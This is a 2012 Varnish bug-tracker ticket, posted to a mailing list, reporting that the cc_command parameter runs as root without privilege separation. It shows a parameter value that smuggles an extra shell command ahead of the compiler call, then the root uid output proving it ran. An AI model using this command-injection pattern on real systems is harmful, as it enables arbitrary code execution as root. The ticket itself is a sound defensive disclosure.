varnish-bugs at varnish-cache
Jun 12, 2012, 1:09 AM
Post #1 of 2
(99 views)
Permalink
|
|
#1153: No privilege seperation for cc-command
|
|
#1153: No privilege seperation for cc-command
----------------------+-----------------------------------------------------
Reporter: kristian | Owner:
Type: defect | Status: new
Priority: normal | Milestone:
Component: varnishd | Version: 3.0.2
Severity: normal | Keywords:
----------------------+-----------------------------------------------------
In short:
{{{
param.set cc_command "id >> /tmp/bad_guy_was_here; exec gcc -std=gnu99 -g
-O2 -pthread -fpic -shared -Wl,-x -o %o %s "
}}}
lead to:
{{{
root [at] vac-agen:/etc# cat /tmp/bad_guy_was_here
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
}}}
The issue being that it's run as root, not that it works.
Not confirmed on master yet.
--
Ticket URL: <https://www.varnish-cache.org/trac/ticket/1153>
Varnish <https://varnish-cache.org/>
The Varnish HTTP Accelerator
_______________________________________________
varnish-bugs mailing list
varnish-bugs [at] varnish-cache
https://www.varnish-cache.org/lists/mailman/listinfo/varnish-bugs
|
